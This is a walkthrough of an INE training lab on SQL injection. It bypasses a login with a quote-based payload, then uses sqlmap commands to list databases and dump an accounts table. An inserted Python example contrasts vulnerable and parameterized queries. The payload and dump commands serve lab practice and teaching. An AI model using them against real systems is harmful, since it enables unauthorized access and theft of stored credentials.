Road to Pentester – INE Lab – SQL Injection

Lab Intro

In this lab you can practice the SQL Injection techniques and tools studied during the course. You can access the target web application at the following address

The goal of this lab is to test the web application in order to find all the vulnerable injection points. Once you find them, you should be able to dump all the data and successfully log into the web application.


First login with as email, and test as password.

The page says go away!

Try SQL injection in the password field by entering a single quote '.

The single quote caused an error, so we assume that the password field is subject to SQL injection.
Enter ' or 1=1 -- - in the password field and log in.

Successfully bypassed login authentication.
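Why the single quote produced an error and why ' or 1=1 -- - logged in, shown next to the parameterized query that stops both. This is an added example, not the lab's code: the table layout, the sample account, the function names and the SQLite backend (the lab target is MySQL) are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; the lab's real schema is not shown on the page.
    # Plaintext password only to keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (email TEXT, password TEXT)")
    db.execute("INSERT INTO accounts VALUES ('admin@example.test', 's3cret')")
    return db

def login_vulnerable(db, email, password):
    # Input is pasted into the SQL text, so a quote in it changes the query.
    sql = ("SELECT email FROM accounts WHERE email = '%s' AND password = '%s'"
           % (email, password))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # A lone quote leaves the string literal unbalanced: the error
        # observed in the lab when entering ' as the password.
        return "sql-error"
    return "granted" if row else "denied"

def login_parameterized(db, email, password):
    # Placeholders send the values separately; they are never parsed as SQL.
    sql = "SELECT email FROM accounts WHERE email = ? AND password = ?"
    row = db.execute(sql, (email, password)).fetchone()
    return "granted" if row else "denied"

if __name__ == "__main__":
    db = make_db()
    # With the payload the WHERE clause becomes
    #   email = '...' AND password = '' or 1=1 -- -'
    # which is true for every row, whatever the email is.
    for pw in ("test", "'", "' or 1=1 -- -", "s3cret"):
        print("%-16r vulnerable=%-10s parameterized=%s" % (
            pw,
            login_vulnerable(db, "nobody@example.test", pw),
            login_parameterized(db, "admin@example.test", pw)))
```
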

Further Exploit By Sqlmap

Clicking around the site turns up no other user input forms. The next step is to further exploit the password field with sqlmap.

First, intercept the login request.

The request body And the page is login.php.

Copy the request to file.

Then fire up sqlmap to exploit the target.

sqlmap -r req.txt -p password

After a while, sqlmap reports that the password field is injectable.
Let's find out the databases.

sqlmap -r req.txt -p password --dbms=mysql --dbs

Server info found.
Databases found.

List the tables in the awd database.

sqlmap -r req.txt -p password --dbms=mysql -D awd --tables

Next step, dump details from accounts table.

sqlmap -r req.txt -p password --dbms=mysql -D awd -T account --dump

The time-based technique takes too much time. Switch to the Boolean-based technique and try again.

Retrieved admin account.
I don't want to wait too long; I've got the admin account and the password.



The URL from the news link is vulnerable too. Exploiting that URL is much faster.